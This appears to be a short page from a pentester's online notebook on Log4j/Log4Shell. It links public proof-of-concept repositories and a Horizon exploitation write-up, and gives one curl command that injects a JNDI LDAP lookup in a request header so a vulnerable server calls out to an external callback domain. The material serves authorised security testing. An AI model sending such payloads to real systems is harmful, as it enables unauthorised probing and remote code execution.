Pentester's Promiscuous Notebook
Twitter
GitHub
Blog
Sponsor
Search
⌃
K
Links
README
⚒️ Pentest
C2
Infrastructure
Misc
OSINT
Password Brute Force
Perimeter
1C
ADFS
Cisco
DNS
Exchange
Information Gathering
IPSec
Java RMI
Log4j / Log4Shell
Lync & Skype for Business
NTP
Outlook
OWA
SharePoint
SMTP
SSH
Subdomain Takeover
Shells
Web
Wi-Fi
⚔️ Red Team
Basics
Cobalt Strike
Infrastructure
Malware Development
SE
⚙️ Admin
Git
Linux
Networking
Virtualization
Windows
Powered By
GitBook
Log4j / Log4Shell
https://github.com/kozmer/log4j-shell-poc
Log4jHorizon
https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return
https://github.com/puzzlepeaches/Log4jHorizon
Check with
DNSLog
:
$ curl -vvk https://vdi.exmaple.com/portal/info.jsp -H 'Accept-Language: ${jndi:ldap://zcf4r9z7oxec13t7fu1k14n0vr1ip8dx.oastify.com:1337/test}'
Last modified
7mo ago